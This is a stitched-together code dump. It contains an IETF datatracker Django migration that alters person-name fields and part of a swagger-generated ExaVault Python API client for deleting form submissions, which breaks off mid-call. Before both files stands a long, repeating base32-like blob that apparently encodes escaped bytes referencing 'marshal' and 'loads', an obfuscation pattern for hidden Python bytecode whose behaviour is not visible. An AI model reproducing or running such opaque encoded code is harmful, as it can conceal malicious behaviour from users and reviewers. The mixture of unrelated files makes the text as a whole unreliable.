ZVY6BQGBOHQMBQLR4DAMDTLR4DAMS4PAYDAXDYGAYFY6BQGBOHQMDDLR4DAMJILR4DAMS4PAYDAXDYGAYFY6BQGB2FY6BQG5OHQMBQLR4DAMC4PAYDA3LBOJZWQYLMOROHQMBVLR4DAMC4PAYDAXDYGAYGY33BMRZSQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDA424PAYDOXDYGAYFY6BQGBOHQMBQHRAXE2LZME7HIXDYGA4FY6BQGBOHQMBQLR4DAMB4NVXWI5LMMU7FY6BQGNOHQMBQLR4DAMC4PAYDA424PAYDEXDYGAYFY6BQGBOHQMBQLR4DAY24PAYDCKC4PAYDEXDYGAYFY6BQGBOHQMBQOROHQMBXLR4DAMC4PAYDAXDYGAYG2YLSONUGC3DULR4DANK4PAYDAXDYGAYFY6BQGBWG6YLEOMUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYHGXDYGA3VY6BQGBOHQMBQLR4DAMB4IFZGS6LBHZ2FY6BQHBOHQMBQLR4DAMC4PAYDAPDNN5SHK3DFHZOHQMBTLR4DAMC4PAYDAXDYGAYHGXDYGAZFY6BQGBOHQMBQLR4DAMC4PAYGGXDYGAYSQXDYGAZFY6BQGBOHQMBQLR4DAMDULR4DAN24PAYDAXDYGAYFY6BQGBWWC4TTNBQWY5C4PAYDKXDYGAYFY6BQGBOHQMBQNRXWCZDTFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGBZVY6BQG5OHQMBQLR4DAMC4PAYDAPCBOJUXSYJ6OROHQMBYLR4DAMC4PAYDAXDYGAYDY3LPMR2WYZJ6LR4DAM24PAYDAXDYGAYFY6BQGBZVY6BQGJOHQMBQLR4DAMC4PAYDAXDYGBRVY6BQGEUFY6BQGJOHQMBQLR4DAMC4PAYDA5C4PAYDOXDYGAYFY6BQGBOHQMBQNVQXE43IMFWHIXDYGA2VY6BQGBOHQMBQLR4DAMDMN5QWI4ZILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQONOHQMBXLR4DAMC4PAYDAXDYGAYDYQLSNF4WCPTULR4DAOC4PAYDAXDYGAYFY6BQGA6G233EOVWGKPS4PAYDGXDYGAYFY6BQGBOHQMBQONOHQMBSLR4DAMC4PAYDAXDYGAYFY6BQMNOHQMBRFBOHQMBSLR4DAMC4PAYDAXDYGAYHIXDYGA3VY6BQGBOHQMBQLR4DAMDNMFZHG2DBNR2FY6BQGVOHQMBQLR4DAMC4PAYDA3DPMFSHGKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMDTLR4DAN24PAYDAXDYGAYFY6BQGA6EC4TJPFQT45C4PAYDQXDYGAYFY6BQGBOHQMBQHRWW6ZDVNRST4XDYGAZVY6BQGBOHQMBQLR4DAMDTLR4DAMS4PAYDAXDYGAYFY6BQGBOHQMDDLR4DAMJILR4DAMS4PAYDAXDYGAYFY6BQGB2FY6BQG5OHQMBQLR4DAMC4PAYDA3LBOJZWQYLMOROHQMBVLR4DAMC4PAYDAXDYGAYGY33BMRZSQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDA424PAYDOXDYGAYFY6BQGBOHQMBQHRAXE2LZME7HIXDYGA4FY6BQGBOHQMBQLR4DAMB4NVXWI5LMMU7FY6BQGNOHQMBQLR4DAMC4PAYDA424PAYDEXDYGAYFY6BQGBOHQMBQLR4DAY24PAYDCKC4PAYDEXDYGAYFY6BQGBOHQMBQOROHQMBXLR4DAMC4PAYDAXDYGAYG2YLSONUGC3DULR4DANK4PAYDAXDYGAYFY6BQGBWG6YLEOMUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYHGXDYGA3VY6BQGBOHQMBQLR4DAMB4IFZGS6LBHZ2FY6BQHBOHQMBQLR4DAMC4PAYDAPDNN5SHK3DFHZOHQMBTLR4DAMC4PAYDAXDYGAYHGXDYGAZFY6BQGBOHQMBQLR4DAMC4PAYGGXDYGAYSQXDYGAZFY6BQGBOHQMBQLR4DAMDULR4DAN24PAYDAXDYGAYFY6BQGBWWC4TTNBQWY5C4PAYDKXDYGAYFY6BQGBOHQMBQNRXWCZDTFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGBZVY6BQG5OHQMBQLR4DAMC4PAYDAPCBOJUXSYJ6OROHQMBYLR4DAMC4PAYDAXDYGAYDY3LPMR2WYZJ6LR4DAM24PAYDAXDYGAYFY6BQGBZVY6BQGJOHQMBQLR4DAMC4PAYDAXDYGBRVY6BQGEUFY6BQGJOHQMBQLR4DAMC4PAYDA5C4PAYDOXDYGAYFY6BQGBOHQMBQNVQXE43IMFWHIXDYGA2VY6BQGBOHQMBQLR4DAMDMN5QWI4ZILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQONOHQMBXLR4DAMC4PAYDAXDYGAYDYQLSNF4WCPTULR4DAOC4PAYDAXDYGAYFY6BQGA6G233EOVWGKPS4PAYDGXDYGAYFY6BQGBOHQMBQONOHQMBSLR4DAMC4PAYDAXDYGAYFY6BQMNOHQMBRFBOHQMBSLR4DAMC4PAYDAXDYGAYHIXDYGA3VY6BQGBOHQMBQLR4DAMDNMFZHG2DBNR2FY6BQGVOHQMBQLR4DAMC4PAYDA3DPMFSHGKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMDTLR4DAN24PAYDAXDYGAYFY6BQGA6EC4TJPFQT45C4PAYDQXDYGAYFY6BQGBOHQMBQHRWW6ZDVNRST4XDYGAZVY6BQGBOHQMBQLR4DAMDTLR4DAMS4PAYDAXDYGAYFY6BQGBOHQMDDLR4DAMJILR4DAMS4PAYDAXDYGAYFY6BQGB2FY6BQG5OHQMBQLR4DAMC4PAYDA3LBOJZWQYLMOROHQMBVLR4DAMC4PAYDAXDYGAYGY33BMRZSQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDA424PAYDOXDYGAYFY6BQGBOHQMBQHRAXE2LZME7HIXDYGA4FY6BQGBOHQMBQLR4DAMB4NVXWI5LMMU7FY6BQGNOHQMBQLR4DAMC4PAYDA424PAYDEXDYGAYFY6BQGBOHQMBQLR4DAY24PAYDCKC4PAYDEXDYGAYFY6BQGBOHQMBQOROHQMBXLR4DAMC4PAYDAXDYGAYG2YLSONUGC3DULR4DANK4PAYDAXDYGAYFY6BQGBWG6YLEOMUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYHGXDYGA3VY6BQGBOHQMBQLR4DAMB4IFZGS6LBHZ2FY6BQHBOHQMBQLR4DAMC4PAYDAPDNN5SHK3DFHZOHQMBTLR4DAMC4PAYDAXDYGAYHGXDYGAZFY6BQGBOHQMBQLR4DAMC4PAYGGXDYGAYSQXDYGAZFY6BQGBOHQMBQLR4DAMDULR4DAN24PAYDAXDYGAYFY6BQGBWWC4TTNBQWY5C4PAYDKXDYGAYFY6BQGBOHQMBQNRXWCZDTFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGBZVY6BQG5OHQMBQLR4DAMC4PAYDAPCBOJUXSYJ6OROHQMBYLR4DAMC4PAYDAXDYGAYDY3LPMR2WYZJ6LR4DAM24PAYDAXDYGAYFY6BQGBZVY6BQGJOHQMBQLR4DAMC4PAYDAXDYGBRVY6BQGEUFY6BQGJOHQMBQLR4DAMC4PAYDA5C4PAYDOXDYGAYFY6BQGBOHQMBQNVQXE43IMFWHIXDYGA2VY6BQGBOHQMBQLR4DAMDMN5QWI4ZILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQONOHQMBXLR4DAMC4PAYDAXDYGAYDYQLSNF4WCPTULR4DAOC4PAYDAXDYGAYFY6BQGA6G233EOVWGKPS4PAYDGXDYGAYFY6BQGBOHQMBQONOHQMBSLR4DAMC4PAYDAXDYGAYFY6BQMNOHQMBRFBOHQMBSLR4DAMC4PAYDAXDYGAYHIXDYGA3VY6BQGBOHQMBQLR4DAMDNMFZHG2DBNR2FY6BQGVOHQMBQLR4DAMC4PAYDA3DPMFSHGKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMDTLR4DAN24PAYDAXDYGAYFY6BQGA6EC4TJPFQT45C4PAYDQXDYGAYFY6BQGBOHQMBQHRWW6ZDVNRST4XDYGAZVY6BQGBOHQMBQLR4DAMDTLR4DAMS4PAYDAXDYGAYFY6BQGBOHQMDDLR4DAMJILR4DAMS4PAYDAXDYGAYFY6BQGB2FY6BQG5OHQMBQLR4DAMC4PAYDA3LBOJZWQYLMOROHQMBVLR4DAMC4PAYDAXDYGAYGY33BMRZSQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDA424PAYDOXDYGAYFY6BQGBOHQMBQHRAXE2LZME7HIXDYGA4FY6BQGBOHQMBQLR4DAMB4NVXWI5LMMU7FY6BQGNOHQMBQLR4DAMC4PAYDA424PAYDEXDYGAYFY6BQGBOHQMBQLR4DAY24PAYDCKC4PAYDEXDYGAYFY6BQGBOHQMBQOROHQMBXLR4DAMC4PAYDAXDYGAYG2YLSONUGC3DULR4DANK4PAYDAXDYGAYFY6BQGBWG6YLEOMUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYHGXDYGA3VY6BQGBOHQMBQLR4DAMB4IFZGS6LBHZ2FY6BQHBOHQMBQLR4DAMC4PAYDAPDNN5SHK3DFHZOHQMBTLR4DAMC4PAYDAXDYGAYHGXDYGAZFY6BQGBOHQMBQLR4DAMC4PAYGGXDYGAYSQXDYGAZFY6BQGBOHQMBQLR4DAMDULR4DAN24PAYDAXDYGAYFY6BQGBWWC4TTNBQWY5C4PAYDKXDYGAYFY6BQGBOHQMBQNRXWCZDTFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGBZVY6BQG5OHQMBQLR4DAMC4PAYDAPCBOJUXSYJ6OROHQMBYLR4DAMC4PAYDAXDYGAYDY3LPMR2WYZJ6LR4DAM24PAYDAXDYGAYFY6BQGBZVY6BQGJOHQMBQLR4DAMC4PAYDAXDYGBRVY6BQGEUFY6BQGJOHQMBQLR4DAMC4PAYDA5C4PAYDOXDYGAYFY6BQGBOHQMBQNVQXE43IMFWHIXDYGA2VY6BQGBOHQMBQLR4DAMDMN5QWI4ZILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQONOHQMBXLR4DAMC4PAYDAXDYGAYDYQLSNF4WCPTULR4DAOC4PAYDAXDYGAYFY6BQGA6G233EOVWGKPS4PAYDGXDYGAYFY6BQGBOHQMBQONOHQMBSLR4DAMC4PAYDAXDYGAYFY6BQMNOHQMBRFBOHQMBSLR4DAMC4PAYDAXDYGAYHIXDYGA3VY6BQGBOHQMBQLR4DAMDNMFZHG2DBNR2FY6BQGVOHQMBQLR4DAMC4PAYDA3DPMFSHGKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMDTLR4DAN24PAYDAXDYGAYFY6BQGA6EC4TJPFQT45C4PAYDQXDYGAYFY6BQGBOHQMBQHRWW6ZDVNRST4XDYGAZVY6BQGBOHQMBQLR4DAMDTLR4DAMS4PAYDAXDYGAYFY6BQGBOHQMDDLR4DAMJILR4DAMS4PAYDAXDYGAYFY6BQGB2FY6BQG5OHQMBQLR4DAMC4PAYDA3LBOJZWQYLMOROHQMBVLR4DAMC4PAYDAXDYGAYGY33BMRZSQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDA424PAYDOXDYGAYFY6BQGBOHQMBQHRAXE2LZME7HIXDYGA4FY6BQGBOHQMBQLR4DAMB4NVXWI5LMMU7FY6BQGNOHQMBQLR4DAMC4PAYDA424PAYDEXDYGAYFY6BQGBOHQMBQLR4DAY24PAYDCKC4PAYDEXDYGAYFY6BQGBOHQMBQOROHQMBXLR4DAMC4PAYDAXDYGAYG2YLSONUGC3DULR4DANK4PAYDAXDYGAYFY6BQGBWG6YLEOMUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYHGXDYGA3VY6BQGBOHQMBQLR4DAMB4IFZGS6LBHZ2FY6BQHBOHQMBQLR4DAMC4PAYDAPDNN5SHK3DFHZOHQMBTLR4DAMC4PAYDAXDYGAYHGXDYGAZFY6BQGBOHQMBQLR4DAMC4PAYGGXDYGAYSQXDYGAZFY6BQGBOHQMBQLR4DAMDULR4DAN24PAYDAXDYGAYFY6BQGBWWC4TTNBQWY5C4PAYDKXDYGAYFY6BQGBOHQMBQNRXWCZDTFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGBZVY6BQG5OHQMBQLR4DAMC4PAYDAPCBOJUXSYJ6OROHQMBYLR4DAMC4PAYDAXDYGAYDY3LPMR2WYZJ6LR4DAM24PAYDAXDYGAYFY6BQGBZVY6BQGJOHQMBQLR4DAMC4PAYDAXDYGBRVY6BQGEUFY6BQGJOHQMBQLR4DAMC4PAYDA5C4PAYDOXDYGAYFY6BQGBOHQMBQNVQXE43IMFWHIXDYGA2VY6BQGBOHQMBQLR4DAMDMN5QWI4ZILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQONOHQMBXLR4DAMC4PAYDAXDYGAYDYQLSNF4WCPTULR4DAOC4PAYDAXDYGAYFY6BQGA6G233EOVWGKPS4PAYDGXDYGAYFY6BQGBOHQMBQONOHQMBSLR4DAMC4PAYDAXDYGAYFY6BQMNOHQMBRFBOHQMBSLR4DAMC4PAYDAXDYGAYHIXDYGA3VY6BQGBOHQMBQLR4DAMDNMFZHG2DBNR2FY6BQGVOHQMBQLR4DAMC4PAYDA3DPMFSHGKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMDTLR4DAN24PAYDAXDYGAYFY6BQGA6EC4TJPFQT45C4PAYDQXDYGAYFY6BQGBOHQMBQHRWW6ZDVNRST4XDYGAZVY6BQGBOHQMBQLR4DAMDTLR4DAMS4PAYDAXDYGAYFY6BQGBOHQMDDLR4DAMJILR4DAMS4PAYDAXDYGAYFY6BQGB2FY6BQG5OHQMBQLR4DAMC4PAYDA3LBOJZWQYLMOROHQMBVLR4DAMC4PAYDAXDYGAYGY33BMRZSQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDA424PAYDOXDYGAYFY6BQGBOHQMBQHRAXE2LZME7HIXDYGA4FY6BQGBOHQMBQLR4DAMB4NVXWI5LMMU7FY6BQGNOHQMBQLR4DAMC4PAYDA424PAYDEXDYGAYFY6BQGBOHQMBQLR4DAY24PAYDCKC4PAYDEXDYGAYFY6BQGBOHQMBQOROHQMBXLR4DAMC4PAYDAXDYGAYG2YLSONUGC3DULR4DANK4PAYDAXDYGAYFY6BQGBWG6YLEOMUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYHGXDYGA3VY6BQGBOHQMBQLR4DAMB4IFZGS6LBHZ2FY6BQHBOHQMBQLR4DAMC4PAYDAPDNN5SHK3DFHZOHQMBTLR4DAMC4PAYDAXDYGAYHGXDYGAZFY6BQGBOHQMBQLR4DAMC4PAYGGXDYGAYSQXDYGAZFY6BQGBOHQMBQLR4DAMDULR4DAN24PAYDAXDYGAYFY6BQGBWWC4TTNBQWY5C4PAYDKXDYGAYFY6BQGBOHQMBQNRXWCZDTFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGBZVY6BQG5OHQMBQLR4DAMC4PAYDAPCBOJUXSYJ6OROHQMBYLR4DAMC4PAYDAXDYGAYDY3LPMR2WYZJ6LR4DAM24PAYDAXDYGAYFY6BQGBZVY6BQGJOHQMBQLR4DAMC4PAYDAXDYGBRVY6BQGEUFY6BQGJOHQMBQLR4DAMC4PAYDA5C4PAYDOXDYGAYFY6BQGBOHQMBQNVQXE43IMFWHIXDYGA2VY6BQGBOHQMBQLR4DAMDMN5QWI4ZILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQONOHQMBXLR4DAMC4PAYDAXDYGAYDYQLSNF4WCPTULR4DAOC4PAYDAXDYGAYFY6BQGA6G233EOVWGKPS4PAYDGXDYGAYFY6BQGBOHQMBQONOHQMBSLR4DAMC4PAYDAXDYGAYFY6BQMNOHQMBRFBOHQMBSLR4DAMC4PAYDAXDYGAYHIXDYGA3VY6BQGBOHQMBQLR4DAMDNMFZHG2DBNR2FY6BQGVOHQMBQLR4DAMC4PAYDA3DPMFSHGKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMDTLR4DAN24PAYDAXDYGAYFY6BQGA6EC4TJPFQT45C4PAYDQXDYGAYFY6BQGBOHQMBQHRWW6ZDVNRST4XDYGAZVY6BQGBOHQMBQLR4DAMDTLR4DAMS4PAYDAXDYGAYFY6BQGBOHQMDDLR4DAMJILR4DAMS4PAYDAXDYGAYFY6BQGB2FY6BQG5OHQMBQLR4DAMC4PAYDA3LBOJZWQYLMOROHQMBVLR4DAMC4PAYDAXDYGAYGY33BMRZSQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDA424PAYDOXDYGAYFY6BQGBOHQMBQHRAXE2LZME7HIXDYGA4FY6BQGBOHQMBQLR4DAMB4NVXWI5LMMU7FY6BQGNOHQMBQLR4DAMC4PAYDA424PAYDEXDYGAYFY6BQGBOHQMBQLR4DAY24PAYDCKC4PAYDEXDYGAYFY6BQGBOHQMBQOROHQMBXLR4DAMC4PAYDAXDYGAYG2YLSONUGC3DULR4DANK4PAYDAXDYGAYFY6BQGBWG6YLEOMUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYHGXDYGA3VY6BQGBOHQMBQLR4DAMB4IFZGS6LBHZ2FY6BQHBOHQMBQLR4DAMC4PAYDAPDNN5SHK3DFHZOHQMBTLR4DAMC4PAYDAXDYGAYHGXDYGAZFY6BQGBOHQMBQLR4DAMC4PAYGGXDYGAYSQXDYGAZFY6BQGBOHQMBQLR4DAMDULR4DAN24PAYDAXDYGAYFY6BQGBWWC4TTNBQWY5C4PAYDKXDYGAYFY6BQGBOHQMBQNRXWCZDTFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGBZVY6BQG5OHQMBQLR4DAMC4PAYDAPCBOJUXSYJ6OROHQMBYLR4DAMC4PAYDAXDYGAYDY3LPMR2WYZJ6LR4DAM24PAYDAXDYGAYFY6BQGBZVY6BQGJOHQMBQLR4DAMC4PAYDAXDYGBRVY6BQGEUFY6BQGJOHQMBQLR4DAMC4PAYDA5C4PAYDOXDYGAYFY6BQGBOHQMBQNVQXE43IMFWHIXDYGA2VY6BQGBOHQMBQLR4DAMDMN5QWI4ZILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQONOHQMBXLR4DAMC4PAYDAXDYGAYDYQLSNF4WCPTULR4DAOC4PAYDAXDYGAYFY6BQGA6G233EOVWGKPS4PAYDGXDYGAYFY6BQGBOHQMBQONOHQMBSLR4DAMC4PAYDAXDYGAYFY6BQMNOHQMBRFBOHQMBSLR4DAMC4PAYDAXDYGAYHIXDYGA3VY6BQGBOHQMBQLR4DAMDNMFZHG2DBNR2FY6BQGVOHQMBQLR4DAMC4PAYDA3DPMFSHGKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMDTLR4DAN24PAYDAXDYGAYFY6BQGA6EC4TJPFQT45C4PAYDQXDYGAYFY6BQGBOHQMBQHRWW6ZDVNRST4XDYGAZVY6BQGBOHQMBQLR4DAMDTLR4DAMS4PAYDAXDYGAYFY6BQGBOHQMDDLR4DAMJILR4DAMS4PAYDAXDYGAYFY6BQGB2FY6BQG5OHQMBQLR4DAMC4PAYDA3LBOJZWQYLMOROHQMBVLR4DAMC4PAYDAXDYGAYGY33BMRZSQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDA424PAYDOXDYGAYFY6BQGBOHQMBQHRAXE2LZME7HIXDYGA4FY6BQGBOHQMBQLR4DAMB4NVXWI5LMMU7FY6BQGNOHQMBQLR4DAMC4PAYDA424PAYDEXDYGAYFY6BQGBOHQMBQLR4DAY24PAYDCKC4PAYDEXDYGAYFY6BQGBOHQMBQOROHQMBXLR4DAMC4PAYDAXDYGAYG2YLSONUGC3DULR4DANK4PAYDAXDYGAYFY6BQGBWG6YLEOMUFY6BQG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Python

ietf/person/migrations/0006_auto_20160503_0937.py

ekr/ietfdb

8d936836b0b9ff31cda415b0a423e3f5b33ab695

[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]

2

2021-11-20T03:40:40.000Z

2021-11-20T03:40:42.000Z

ietf/person/migrations/0006_auto_20160503_0937.py

ekr/ietfdb

8d936836b0b9ff31cda415b0a423e3f5b33ab695

[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]

null

ietf/person/migrations/0006_auto_20160503_0937.py

ekr/ietfdb

8d936836b0b9ff31cda415b0a423e3f5b33ab695

[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]

null

# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('person', '0005_deactivate_unknown_email'), ] operations = [ migrations.AlterField( model_name='person', name='ascii', field=models.CharField(max_length=255, verbose_name=b'Full Name (ASCII)'), preserve_default=True, ), migrations.AlterField( model_name='person', name='ascii_short', field=models.CharField(max_length=32, null=True, verbose_name=b'Abbreviated Name (ASCII)', blank=True), preserve_default=True, ), migrations.AlterField( model_name='person', name='name', field=models.CharField(max_length=255, verbose_name=b'Full Name (Unicode)', db_index=True), preserve_default=True, ), migrations.AlterField( model_name='personhistory', name='ascii', field=models.CharField(max_length=255, verbose_name=b'Full Name (ASCII)'), preserve_default=True, ), migrations.AlterField( model_name='personhistory', name='ascii_short', field=models.CharField(max_length=32, null=True, verbose_name=b'Abbreviated Name (ASCII)', blank=True), preserve_default=True, ), migrations.AlterField( model_name='personhistory', name='name', field=models.CharField(max_length=255, verbose_name=b'Full Name (Unicode)', db_index=True), preserve_default=True, ), ]

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py

Python

exavault/api/form_api.py

ExaVault/evapi-python

769bfa9fbb683f2b4653ca2564029ffb72445c8c

[ "MIT" ]

null

exavault/api/form_api.py

ExaVault/evapi-python

769bfa9fbb683f2b4653ca2564029ffb72445c8c

[ "MIT" ]

3

2017-07-13T20:58:05.000Z

2019-08-02T19:08:37.000Z

exavault/api/form_api.py

ExaVault/evapi-python

769bfa9fbb683f2b4653ca2564029ffb72445c8c

[ "MIT" ]

4

2016-11-16T00:14:23.000Z

2020-09-24T14:50:46.000Z

# coding: utf-8 """ ExaVault API See our API reference documentation at https://www.exavault.com/developer/api-docs/ # noqa: E501 OpenAPI spec version: 2.0 Contact: support@exavault.com Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from exavault.api_client import ApiClient class FormApi(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def delete_form_message_by_id(self, ev_api_key, ev_access_token, id, **kwargs): # noqa: E501 """Delete a receive form submission # noqa: E501 Deletes a form submission entry, which represents one time that a visitor filled out the form and uploaded files. This deletes only the record of the submission (the date, the values entered in the form and the names of the files uploaded by the visitor).The share and any associated file resources will not be deleted by this. **Notes**: - Use the [GET /form/entries/{formId}](#operation/getFormMessageById) to list the submissions and obtain the ID of the entry you want to delete - You must have the [DeleteFormData permission](/docs/account/04-users/00-introduction#managing-user-roles-and-permissions) in order to use this operation - It is not possible to un-delete data that is removed in this way # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_form_message_by_id(ev_api_key, ev_access_token, id, async_req=True) >>> result = thread.get() :param async_req bool :param str ev_api_key: API Key required to make the API call. (required) :param str ev_access_token: Access token required to make the API call. (required) :param int id: ID of the entry to be deleted data for (required) :return: EmptyResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.delete_form_message_by_id_with_http_info(ev_api_key, ev_access_token, id, **kwargs) # noqa: E501 else: (data) = self.delete_form_message_by_id_with_http_info(ev_api_key, ev_access_token, id, **kwargs) # noqa: E501 return data def delete_form_message_by_id_with_http_info(self, ev_api_key, ev_access_token, id, **kwargs): # noqa: E501 """Delete a receive form submission # noqa: E501 Deletes a form submission entry, which represents one time that a visitor filled out the form and uploaded files. This deletes only the record of the submission (the date, the values entered in the form and the names of the files uploaded by the visitor).The share and any associated file resources will not be deleted by this. **Notes**: - Use the [GET /form/entries/{formId}](#operation/getFormMessageById) to list the submissions and obtain the ID of the entry you want to delete - You must have the [DeleteFormData permission](/docs/account/04-users/00-introduction#managing-user-roles-and-permissions) in order to use this operation - It is not possible to un-delete data that is removed in this way # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.delete_form_message_by_id_with_http_info(ev_api_key, ev_access_token, id, async_req=True) >>> result = thread.get() :param async_req bool :param str ev_api_key: API Key required to make the API call. (required) :param str ev_access_token: Access token required to make the API call. (required) :param int id: ID of the entry to be deleted data for (required) :return: EmptyResponse If the method is called asynchronously, returns the request thread. """ all_params = ['ev_api_key', 'ev_access_token', 'id'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method delete_form_message_by_id" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'ev_api_key' is set if ('ev_api_key' not in params or params['ev_api_key'] is None): raise ValueError("Missing the required parameter `ev_api_key` when calling `delete_form_message_by_id`") # noqa: E501 # verify the required parameter 'ev_access_token' is set if ('ev_access_token' not in params or params['ev_access_token'] is None): raise ValueError("Missing the required parameter `ev_access_token` when calling `delete_form_message_by_id`") # noqa: E501 # verify the required parameter 'id' is set if ('id' not in params or params['id'] is None): raise ValueError("Missing the required parameter `id` when calling `delete_form_message_by_id`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in params: path_params['id'] = params['id'] # noqa: E501 query_params = [] header_params = {} if 'ev_api_key' in params: header_params['ev-api-key'] = params['ev_api_key'] # noqa: E501 if 'ev_access_token' in params: header_params['ev-access-token'] = params['ev_access_token'] # noqa: E501 form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = [] # noqa: E501 return self.api_client.call_api( '/forms/entries/{id}', 'DELETE', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, 